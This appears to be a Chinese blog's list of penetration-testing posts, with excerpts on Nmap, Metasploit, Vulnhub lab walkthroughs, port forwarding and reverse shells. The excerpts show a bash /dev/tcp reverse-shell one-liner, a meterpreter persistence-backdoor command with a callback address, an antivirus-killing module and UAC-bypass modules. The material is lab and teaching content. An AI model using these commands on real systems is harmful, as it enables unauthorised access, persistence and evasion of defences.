渗透
「已注销」
这个作者很懒,什么都没留下…
展开
-
Nmap详解
Nmap详解##前沿: 学长在一篇总结下进行了如下的评论。仔细想想自己以前真的没大多深入的学习nmap。于是今天来学习一手。nmap 参数详解例如:blah.highon.coffee, namp.org/24, 192.168.0.1;10.0.0-25.1-254-iL filename 从文件中读取待检测的目标,文件中的表示方法支持机名,ip,...原创 2019-12-09 20:22:48 · 496 阅读 · 0 评论 -
后渗透流程
后渗透流程权限提升绕过UACmsf模块Exploit/windows/local/bypassuacExploit/windows/local/bypassuac_injectionExploit/windows/local/bypassuac_vbs系统提权提高程序运行级别msf模块(Exploit/windows/local/ask)缺点:需要uac交互后渗透信...原创 2019-12-09 20:20:45 · 983 阅读 · 0 评论 -
一次迷迷糊糊的靶机渗透Lazsysadmin实战
靶机ip:192.168.85.141 kali攻击机:192.168.85.130发现靶机开启了22,80,139,445,3306,6667端口,并且靶机运行着samba服务先来看看80端口。发现这个网页由Silex v2构成的发现网站就是一个静态网页,并没有什么用。于是用dirbuster进行目录爆破在目录爆破中,我们发现了phpmyadmin,wordpress,...原创 2019-09-01 18:10:45 · 1222 阅读 · 0 评论 -
Billu_b0x靶机渗透实战
攻击机:kali ip:192.168.85.130检查主机存活.发现192.168.85.140就是我们的目标主机了查看目标主机开放的端口,发现开放了80端口和22端口,并且SSH为5.9版本,apache为2.2.22版本访问80端口这里提示SQLI,即可能存在sql注入使用bp抓包,放入sqlmap中检测,报错。使用一些模块进行绕过,也没有成功。例如:python2 sq...原创 2019-08-22 22:42:43 · 587 阅读 · 1 评论 -
内网文件的传输与下载
SCP本地到远程将本地文件上传到服务器scp -P 2222 /home/tmp/flag.php root@host_ip:/root/tmp/root@host_ip表示使用root用户登陆远程服务器/home/tmp/flag.php表示本地上传的文件/root/tmp表示保存在远程服务器上的目录和文件名-P 表示选择端口,注意-p已经被rcp使用;远程到本地scp ...原创 2019-08-22 15:28:07 · 3412 阅读 · 0 评论 -
认识powershell攻击
简介:PowerShell是一种基于任务的命令行shell和脚本语言建立在net。 PowerShell帮助系统管理员和高级用户快速自动化管理的任务 操作系统(Linux、macOS和Windows)和过程。PowerShell命令允许您从命令行管理电脑。 PowerShell供应商让你 访问数据存储,如注册表和证书存储,尽可能轻松地访问文件 系统。其可读性,易用性,基于当前所有shell之首。...原创 2019-08-12 17:09:38 · 1727 阅读 · 0 评论 -
meterpreter后渗透之权限维持
Persistence后门使用此方法建议运行前关闭杀毒软件Run post/windows/manage/killav输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130创建一个持久性的后门。详细信息如下:-A 自动启动一个匹配的漏洞/多/处理程序来连接到代理-L如果不使用%TEMP%,则选择目标主机中写入有效负载的...原创 2019-08-09 19:50:00 · 3086 阅读 · 1 评论 -
一文了解端口转发
内网端口转发应用场景:当你拿到一个网站的shell,然后提权,以及各种的一些操作,当你想开启目标服务器的远程桌面时,然而他却处于内网的服务器中,有什么办法实现呢?这里就要运用到端口转发了。端口转发技术,用于允许外部备使用私人电脑服务网络。对于防火墙禁止访问某些端口的问题,比如3389端口,我们可以将利用机器的3000端口做端口转发,从外界接受数据,转发给本机的3389端口,从而绕过防火...原创 2019-08-19 12:12:46 · 20401 阅读 · 0 评论 -
一次失败的vulnhub靶机渗透之breach1.0
靶机地址下载https://pan.baidu.com/s/1KuwK_8MqCWhcIcNpTJ-OLQ这是靶机的介绍在一个由多个部分组成的系列文章中,Breach 1.0是一个初学者到中级boot2root/CTF挑战。解决问题需要扎实的信息收集和坚持不懈的努力。千方百计。VM配置了一个静态IP地址(192.168.110.140),因此您需要将您的主机专用适配器配置到这个子网。非常...原创 2019-08-06 10:49:25 · 1459 阅读 · 8 评论 -
渗透之metasploit技术-端口扫描,漏洞利用
一,使用主机模块进行端口扫描启用metasploit msfconsole检查有哪些可用端口。search portscan使用TCP扫描模块并检查有那些参数需要设置。use [模板]show options设置待扫描的IP地址(RHOSTS),设置扫描的端口范围(PORTS),设置扫描的线程(THREADS),最后使用show options查看设置的参数。run,运行。...原创 2019-07-31 17:15:08 · 6743 阅读 · 0 评论 -
linux反弹shell的几种方法
攻击机上执行 nc -lvp 2333说明:-l 使用监听模式,管控传入的资料。显示指令执行过程。<通信端口> 设置本地主机使用的通信端口。(2333即为自己设置的通信端口)第一种方法:使用bash命令(bash命令行是计算机操作的一种方式)攻击机上输入 nc -lvp 2333受害机上输入 bash -i >& /dev/tcp/192.168.10...原创 2019-07-30 18:18:12 · 278 阅读 · 0 评论 -
Vulnhub之acid靶机渗透流程
1,检查靶机主机是否存活。2,检查靶机开放的端口并对端口进行识别发现33447端口存活(存在web服务)由于只存在web服务和apache服务,所以只能从web服务和apache服务下手。3,首先直接御剑一把梭大概看了下,先放在这里。F12查看网页源码,发现存在注释。0x643239334c6d70775a773d3d16进制转换为字符串d293LmpwZw==,最终解码出来...原创 2019-08-03 10:58:50 · 1041 阅读 · 0 评论